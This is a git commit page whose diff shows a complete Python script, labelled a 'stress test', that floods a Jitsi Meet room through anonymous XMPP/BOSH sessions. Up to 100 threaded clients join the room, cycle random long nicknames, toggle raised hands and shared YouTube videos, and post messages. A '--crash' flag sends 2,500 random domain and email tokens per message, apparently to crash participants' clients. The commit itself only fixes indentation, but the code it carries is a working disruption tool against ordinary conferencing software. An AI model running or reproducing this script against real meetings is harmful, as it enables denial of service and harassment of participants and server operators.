Fixed indent error and removed spaces for tabs

This commit is contained in:
Dionysus 2024-10-12 23:02:22 -04:00
parent 5b3b0c5ce2
commit 0717001b28
Signed by: acidvegas
GPG Key ID: EF4B922DB85DC9DE

View File

@ -16,255 +16,255 @@ import xml.etree.ElementTree as ET
def client_join(client_id: int, tlds: list, args: argparse.Namespace, video_id: str) -> None: def client_join(client_id: int, tlds: list, args: argparse.Namespace, video_id: str) -> None:
'''Performs the client join process and handles messaging, hand raising, nickname changes, and video sharing. '''Performs the client join process and handles messaging, hand raising, nickname changes, and video sharing.
:param client_id: The ID of the client (thread number) :param client_id: The ID of the client (thread number)
:param tlds: List of TLDs to use for generating messages :param tlds: List of TLDs to use for generating messages
:param args: Parsed command-line arguments :param args: Parsed command-line arguments
:param video_id: YouTube video ID to share :param video_id: YouTube video ID to share
''' '''
try: try:
print(f'Client {client_id}: Starting') print(f'Client {client_id}: Starting')
cookie_jar = http.cookiejar.CookieJar() cookie_jar = http.cookiejar.CookieJar()
opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cookie_jar)) opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cookie_jar))
headers = {'Content-Type': 'text/xml; charset=utf-8'} headers = {'Content-Type': 'text/xml; charset=utf-8'}
rid = random.randint(1000000, 9999999) rid = random.randint(1000000, 9999999)
parsed_url = urllib.parse.urlparse(args.target) parsed_url = urllib.parse.urlparse(args.target)
target_domain = parsed_url.hostname target_domain = parsed_url.hostname
room_name = parsed_url.path.strip('/') room_name = parsed_url.path.strip('/')
if not room_name: if not room_name:
print(f'Client {client_id}: No room name specified in the target URL.') print(f'Client {client_id}: No room name specified in the target URL.')
return return
bosh_url = f'https://{target_domain}/http-bind' bosh_url = f'https://{target_domain}/http-bind'
if args.nick: if args.nick:
if isinstance(args.nick, str) and args.nick is not True: if isinstance(args.nick, str) and args.nick is not True:
base_nick = args.nick base_nick = args.nick
random_length = 50 - len(base_nick) - 2 random_length = 50 - len(base_nick) - 2
if random_length < 0: if random_length < 0:
print(f'Client {client_id}: Nickname is too long.') print(f'Client {client_id}: Nickname is too long.')
return return
nickname = ''.join(random.choices(string.ascii_letters + string.digits, k=random_length//2)) + '_' + base_nick + '_' + ''.join(random.choices(string.ascii_letters + string.digits, k=random_length - random_length//2)) nickname = ''.join(random.choices(string.ascii_letters + string.digits, k=random_length//2)) + '_' + base_nick + '_' + ''.join(random.choices(string.ascii_letters + string.digits, k=random_length - random_length//2))
else: else:
nickname = ''.join(random.choices(string.ascii_letters + string.digits, k=50)) nickname = ''.join(random.choices(string.ascii_letters + string.digits, k=50))
else: else:
nickname = ''.join(random.choices(string.ascii_letters + string.digits, k=10)) nickname = ''.join(random.choices(string.ascii_letters + string.digits, k=10))
print(f'Client {client_id}: Establishing session') print(f'Client {client_id}: Establishing session')
body = f'''<body rid='{rid}' to='{target_domain}' xml:lang='en' wait='60' hold='1' xmlns='http://jabber.org/protocol/httpbind'/>''' body = f'''<body rid='{rid}' to='{target_domain}' xml:lang='en' wait='60' hold='1' xmlns='http://jabber.org/protocol/httpbind'/>'''
request = urllib.request.Request(bosh_url, data=body.encode('utf-8'), headers=headers, method='POST') request = urllib.request.Request(bosh_url, data=body.encode('utf-8'), headers=headers, method='POST')
response = opener.open(request, timeout=10) response = opener.open(request, timeout=10)
response_text = response.read().decode('utf-8') response_text = response.read().decode('utf-8')
sid = extract_sid(response_text) sid = extract_sid(response_text)
if not sid: if not sid:
print(f'Client {client_id}: Failed to obtain session ID.') print(f'Client {client_id}: Failed to obtain session ID.')
print(f'Client {client_id}: Server response: {response_text}') print(f'Client {client_id}: Server response: {response_text}')
return return
print(f'Client {client_id}: Obtained session ID: {sid}') print(f'Client {client_id}: Obtained session ID: {sid}')
rid += 1 rid += 1
print(f'Client {client_id}: Sending authentication request') print(f'Client {client_id}: Sending authentication request')
auth_body = f'''<body rid='{rid}' sid='{sid}' xmlns='http://jabber.org/protocol/httpbind'> auth_body = f'''<body rid='{rid}' sid='{sid}' xmlns='http://jabber.org/protocol/httpbind'>
<auth mechanism='ANONYMOUS' xmlns='urn:ietf:params:xml:ns:xmpp-sasl'/> <auth mechanism='ANONYMOUS' xmlns='urn:ietf:params:xml:ns:xmpp-sasl'/>
</body>''' </body>'''
request = urllib.request.Request(bosh_url, data=auth_body.encode('utf-8'), headers=headers, method='POST') request = urllib.request.Request(bosh_url, data=auth_body.encode('utf-8'), headers=headers, method='POST')
response = opener.open(request, timeout=10) response = opener.open(request, timeout=10)
response_text = response.read().decode('utf-8') response_text = response.read().decode('utf-8')
if '<success' in response_text: if '<success' in response_text:
print(f'Client {client_id}: Authentication successful.') print(f'Client {client_id}: Authentication successful.')
else: else:
print(f'Client {client_id}: Authentication failed.') print(f'Client {client_id}: Authentication failed.')
print(f'Client {client_id}: Server response: {response_text}') print(f'Client {client_id}: Server response: {response_text}')
return return
rid += 1 rid += 1
print(f'Client {client_id}: Restarting stream') print(f'Client {client_id}: Restarting stream')
restart_body = f'''<body rid='{rid}' sid='{sid}' xmlns='http://jabber.org/protocol/httpbind' to='{target_domain}' xml:lang='en' xmpp:restart='true' xmlns:xmpp='urn:xmpp:xbosh'/>''' restart_body = f'''<body rid='{rid}' sid='{sid}' xmlns='http://jabber.org/protocol/httpbind' to='{target_domain}' xml:lang='en' xmpp:restart='true' xmlns:xmpp='urn:xmpp:xbosh'/>'''
request = urllib.request.Request(bosh_url, data=restart_body.encode('utf-8'), headers=headers, method='POST') request = urllib.request.Request(bosh_url, data=restart_body.encode('utf-8'), headers=headers, method='POST')
response = opener.open(request, timeout=10) response = opener.open(request, timeout=10)
rid += 1 rid += 1
print(f'Client {client_id}: Binding resource') print(f'Client {client_id}: Binding resource')
bind_body = f'''<body rid='{rid}' sid='{sid}' xmlns='http://jabber.org/protocol/httpbind'> bind_body = f'''<body rid='{rid}' sid='{sid}' xmlns='http://jabber.org/protocol/httpbind'>
<iq type='set' id='bind_1' xmlns='jabber:client'> <iq type='set' id='bind_1' xmlns='jabber:client'>
<bind xmlns='urn:ietf:params:xml:ns:xmpp-bind'/> <bind xmlns='urn:ietf:params:xml:ns:xmpp-bind'/>
</iq> </iq>
</body>''' </body>'''
request = urllib.request.Request(bosh_url, data=bind_body.encode('utf-8'), headers=headers, method='POST') request = urllib.request.Request(bosh_url, data=bind_body.encode('utf-8'), headers=headers, method='POST')
response = opener.open(request, timeout=10) response = opener.open(request, timeout=10)
response_text = response.read().decode('utf-8') response_text = response.read().decode('utf-8')
jid = extract_jid(response_text) jid = extract_jid(response_text)
if not jid: if not jid:
print(f'Client {client_id}: Failed to bind resource.') print(f'Client {client_id}: Failed to bind resource.')
print(f'Client {client_id}: Server response: {response_text}') print(f'Client {client_id}: Server response: {response_text}')
return return
print(f'Client {client_id}: Bound resource. JID: {jid}') print(f'Client {client_id}: Bound resource. JID: {jid}')
rid += 1 rid += 1
print(f'Client {client_id}: Sending initial presence') print(f'Client {client_id}: Sending initial presence')
presence_elements = [ presence_elements = [
'<x xmlns=\'http://jabber.org/protocol/muc\'/>', '<x xmlns=\'http://jabber.org/protocol/muc\'/>',
f'<nick xmlns=\'http://jabber.org/protocol/nick\'>{nickname}</nick>' f'<nick xmlns=\'http://jabber.org/protocol/nick\'>{nickname}</nick>'
] ]
presence_stanza = ''.join(presence_elements) presence_stanza = ''.join(presence_elements)
room_jid = f'{room_name}@conference.{target_domain}/{nickname}' room_jid = f'{room_name}@conference.{target_domain}/{nickname}'
presence_body = f'''<body rid='{rid}' sid='{sid}' xmlns='http://jabber.org/protocol/httpbind'> presence_body = f'''<body rid='{rid}' sid='{sid}' xmlns='http://jabber.org/protocol/httpbind'>
<presence to='{room_jid}' xmlns='jabber:client'> <presence to='{room_jid}' xmlns='jabber:client'>
{presence_stanza} {presence_stanza}
</presence> </presence>
</body>''' </body>'''
request = urllib.request.Request(bosh_url, data=presence_body.encode('utf-8'), headers=headers, method='POST') request = urllib.request.Request(bosh_url, data=presence_body.encode('utf-8'), headers=headers, method='POST')
response = opener.open(request, timeout=10) response = opener.open(request, timeout=10)
response_text = response.read().decode('utf-8') response_text = response.read().decode('utf-8')
print(f'Client {client_id}: Server response to initial presence (join room):') print(f'Client {client_id}: Server response to initial presence (join room):')
print(response_text) print(response_text)
rid += 1 rid += 1
hand_raised = True hand_raised = True
for i in range(1, 101): for i in range(1, 101):
print(f'Client {client_id}: Starting iteration {i}') print(f'Client {client_id}: Starting iteration {i}')
if args.nick: if args.nick:
if isinstance(args.nick, str) and args.nick is not True: if isinstance(args.nick, str) and args.nick is not True:
base_nick = args.nick base_nick = args.nick
random_length = 50 - len(base_nick) - 2 random_length = 50 - len(base_nick) - 2
if random_length < 0: if random_length < 0:
print(f'Client {client_id}: Nickname is too long.') print(f'Client {client_id}: Nickname is too long.')
return return
nickname = ''.join(random.choices(string.ascii_letters + string.digits, k=random_length//2)) + '_' + base_nick + '_' + ''.join(random.choices(string.ascii_letters + string.digits, k=random_length - random_length//2)) nickname = ''.join(random.choices(string.ascii_letters + string.digits, k=random_length//2)) + '_' + base_nick + '_' + ''.join(random.choices(string.ascii_letters + string.digits, k=random_length - random_length//2))
else: else:
nickname = ''.join(random.choices(string.ascii_letters + string.digits, k=50)) nickname = ''.join(random.choices(string.ascii_letters + string.digits, k=50))
presence_elements = [] presence_elements = []
presence_elements.append(f'<nick xmlns=\'http://jabber.org/protocol/nick\'>{nickname}</nick>') presence_elements.append(f'<nick xmlns=\'http://jabber.org/protocol/nick\'>{nickname}</nick>')
if args.hand: if args.hand:
timestamp = int(time.time() * 1000) timestamp = int(time.time() * 1000)
if hand_raised: if hand_raised:
presence_elements.append(f'<jitsi_participant_raisedHand>{timestamp}</jitsi_participant_raisedHand>') presence_elements.append(f'<jitsi_participant_raisedHand>{timestamp}</jitsi_participant_raisedHand>')
hand_raised = not hand_raised hand_raised = not hand_raised
if args.youtube and video_id: if args.youtube and video_id:
video_state = 'start' if i % 2 == 1 else 'stop' video_state = 'start' if i % 2 == 1 else 'stop'
presence_elements.append(f'<shared-video from=\'{jid}\' state=\'{video_state}\' time=\'0\'>{video_id}</shared-video>') presence_elements.append(f'<shared-video from=\'{jid}\' state=\'{video_state}\' time=\'0\'>{video_id}</shared-video>')
if args.nick or args.hand or args.youtube: if args.nick or args.hand or args.youtube:
presence_stanza = ''.join(presence_elements) presence_stanza = ''.join(presence_elements)
room_jid = f'{room_name}@conference.{target_domain}/{nickname}' room_jid = f'{room_name}@conference.{target_domain}/{nickname}'
presence_body = f'''<body rid='{rid}' sid='{sid}' xmlns='http://jabber.org/protocol/httpbind'> presence_body = f'''<body rid='{rid}' sid='{sid}' xmlns='http://jabber.org/protocol/httpbind'>
<presence to='{room_jid}' xmlns='jabber:client'> <presence to='{room_jid}' xmlns='jabber:client'>
{presence_stanza} {presence_stanza}
</presence> </presence>
</body>''' </body>'''
request = urllib.request.Request(bosh_url, data=presence_body.encode('utf-8'), headers=headers, method='POST') request = urllib.request.Request(bosh_url, data=presence_body.encode('utf-8'), headers=headers, method='POST')
response = opener.open(request, timeout=10) response = opener.open(request, timeout=10)
response_text = response.read().decode('utf-8') response_text = response.read().decode('utf-8')
print(f'Client {client_id}: Server response to presence update:') print(f'Client {client_id}: Server response to presence update:')
print(response_text) print(response_text)
rid += 1 rid += 1
if args.crash or args.message: if args.crash or args.message:
if args.crash: if args.crash:
if not tlds: if not tlds:
print(f'Client {client_id}: TLD list is empty. Using default TLDs.') print(f'Client {client_id}: TLD list is empty. Using default TLDs.')
tlds = ['com', 'net', 'org', 'info', 'io'] tlds = ['com', 'net', 'org', 'info', 'io']
msg = ' '.join( f'{random_word(2)}@{random_word(2)}.{random.choice(tlds)}' if random.choice([True,False]) else f'{random_word(4)}.{random.choice(tlds)}' for _ in range(2500)) msg = ' '.join( f'{random_word(2)}@{random_word(2)}.{random.choice(tlds)}' if random.choice([True,False]) else f'{random_word(4)}.{random.choice(tlds)}' for _ in range(2500))
elif args.message: elif args.message:
msg = args.message msg = args.message
message_body = f'''<body rid='{rid}' sid='{sid}' xmlns='http://jabber.org/protocol/httpbind'> message_body = f'''<body rid='{rid}' sid='{sid}' xmlns='http://jabber.org/protocol/httpbind'>
<message to='{room_name}@conference.{target_domain}' type='groupchat' xmlns='jabber:client'> <message to='{room_name}@conference.{target_domain}' type='groupchat' xmlns='jabber:client'>
<body>{msg}</body> <body>{msg}</body>
</message> </message>
</body>''' </body>'''
request = urllib.request.Request(bosh_url, data=message_body.encode('utf-8'), headers=headers, method='POST') request = urllib.request.Request(bosh_url, data=message_body.encode('utf-8'), headers=headers, method='POST')
response = opener.open(request, timeout=10) response = opener.open(request, timeout=10)
response_text = response.read().decode('utf-8') response_text = response.read().decode('utf-8')
print(f'Client {client_id}: Server response to message {i}:') print(f'Client {client_id}: Server response to message {i}:')
print(response_text) print(response_text)
rid += 1 rid += 1
print(f'Client {client_id}: Finished') print(f'Client {client_id}: Finished')
except Exception as e: except Exception as e:
print(f'Client {client_id}: Exception occurred: {e}') print(f'Client {client_id}: Exception occurred: {e}')
def extract_jid(response_text: str) -> str: def extract_jid(response_text: str) -> str:
'''Extracts the JID from the XML response. '''Extracts the JID from the XML response.
:param response_text: The XML response text from which to extract the JID :param response_text: The XML response text from which to extract the JID
''' '''
try: try:
root = ET.fromstring(response_text) root = ET.fromstring(response_text)
for elem in root.iter(): for elem in root.iter():
if 'jid' in elem.tag: if 'jid' in elem.tag:
return elem.text return elem.text
return None return None
except ET.ParseError: except ET.ParseError:
return None return None
def extract_sid(response_text: str) -> str: def extract_sid(response_text: str) -> str:
'''Extracts the SID from the XML response. '''Extracts the SID from the XML response.
:param response_text: The XML response text from which to extract the SID :param response_text: The XML response text from which to extract the SID
''' '''
try: try:
root = ET.fromstring(response_text) root = ET.fromstring(response_text)
return root.attrib.get('sid') return root.attrib.get('sid')
except ET.ParseError: except ET.ParseError:
return None return None
def force_ipv4() -> None: def force_ipv4() -> None:
'''Forces the use of IPv4 by monkey-patching socket.getaddrinfo.''' '''Forces the use of IPv4 by monkey-patching socket.getaddrinfo.'''
socket._original_getaddrinfo = socket.getaddrinfo socket._original_getaddrinfo = socket.getaddrinfo
def getaddrinfo_ipv4_only(host, port, family=0, type=0, proto=0, flags=0): def getaddrinfo_ipv4_only(host, port, family=0, type=0, proto=0, flags=0):
return socket._original_getaddrinfo(host, port, socket.AF_INET, type, proto, flags) return socket._original_getaddrinfo(host, port, socket.AF_INET, type, proto, flags)
socket.getaddrinfo = getaddrinfo_ipv4_only socket.getaddrinfo = getaddrinfo_ipv4_only
def main() -> None: def main() -> None:
'''Main function to start threads and execute the stress test.''' '''Main function to start threads and execute the stress test.'''
parser = argparse.ArgumentParser(description='Stress test a Jitsi Meet server.') parser = argparse.ArgumentParser(description='Stress test a Jitsi Meet server.')
parser.add_argument('target', help='Target room URL (e.g., https://meet.jit.si/roomname)') parser.add_argument('target', help='Target room URL (e.g., https://meet.jit.si/roomname)')
parser.add_argument('--crash', action='store_true', help='Enable crash (send large messages with random TLDs)') parser.add_argument('--crash', action='store_true', help='Enable crash (send large messages with random TLDs)')
parser.add_argument('--message', type=str, help='Send a custom message') parser.add_argument('--message', type=str, help='Send a custom message')
parser.add_argument('--hand', action='store_true', help='Enable hand raising') parser.add_argument('--hand', action='store_true', help='Enable hand raising')
parser.add_argument('--nick', nargs='?', const=True, help='Enable nickname changes. Optionally provide a nickname') parser.add_argument('--nick', nargs='?', const=True, help='Enable nickname changes. Optionally provide a nickname')
parser.add_argument('--youtube', type=str, help='Share a YouTube video (provide URL)') parser.add_argument('--youtube', type=str, help='Share a YouTube video (provide URL)')
parser.add_argument('--threads', type=int, default=100, help='Number of threads (clients) to use') parser.add_argument('--threads', type=int, default=100, help='Number of threads (clients) to use')
args = parser.parse_args() args = parser.parse_args()
tlds = [] tlds = []
if args.crash: if args.crash:
print('Fetching TLDs') print('Fetching TLDs')
try: try:
tlds_url = 'https://data.iana.org/TLD/tlds-alpha-by-domain.txt' tlds_url = 'https://data.iana.org/TLD/tlds-alpha-by-domain.txt'
request = urllib.request.Request(tlds_url) request = urllib.request.Request(tlds_url)
with urllib.request.urlopen(request, timeout=10) as response: with urllib.request.urlopen(request, timeout=10) as response:
response_text = response.read().decode('utf-8') response_text = response.read().decode('utf-8')
tlds = [line.lower() for line in response_text.splitlines() if not line.startswith('#')] tlds = [line.lower() for line in response_text.splitlines() if not line.startswith('#')]
print(f'Number of TLDs fetched: {len(tlds)}') print(f'Number of TLDs fetched: {len(tlds)}')
if not tlds: if not tlds:
print('TLD list is empty after fetching. Using default TLDs.') print('TLD list is empty after fetching. Using default TLDs.')
tlds = ['com', 'net', 'org', 'info', 'io'] tlds = ['com', 'net', 'org', 'info', 'io']
except Exception as e: except Exception as e:
print(f'Failed to fetch TLDs: {e}') print(f'Failed to fetch TLDs: {e}')
print('Using default TLDs.') print('Using default TLDs.')
tlds = ['com', 'net', 'org', 'info', 'io'] tlds = ['com', 'net', 'org', 'info', 'io']
video_id = None video_id = None
if args.youtube: if args.youtube:
youtube_url = args.youtube youtube_url = args.youtube
video_id_match = re.search(r'(?:v=|\/)([0-9A-Za-z_-]{11}).*', youtube_url) video_id_match = re.search(r'(?:v=|\/)([0-9A-Za-z_-]{11}).*', youtube_url)
if video_id_match: if video_id_match:
video_id = video_id_match.group(1) video_id = video_id_match.group(1)
print(f'Parsed YouTube video ID: {video_id}') print(f'Parsed YouTube video ID: {video_id}')
else: else:
print('Invalid YouTube URL provided.') print('Invalid YouTube URL provided.')
return return
threads = [] threads = []
for i in range(args.threads): for i in range(args.threads):
t = threading.Thread(target=client_join, args=(i, tlds, args, video_id)) t = threading.Thread(target=client_join, args=(i, tlds, args, video_id))
threads.append(t) threads.append(t)
t.start() t.start()
for t in threads: for t in threads:
t.join() t.join()
def random_word(length: int) -> str: def random_word(length: int) -> str:
'''Generates a random word of a given length. '''Generates a random word of a given length.
:param length: The length of the word to generate :param length: The length of the word to generate
''' '''
letters = string.ascii_lowercase letters = string.ascii_lowercase
return ''.join(random.choice(letters) for _ in range(length)) return ''.join(random.choice(letters) for _ in range(length))
if __name__ == '__main__': if __name__ == '__main__':
force_ipv4() force_ipv4()
main() main()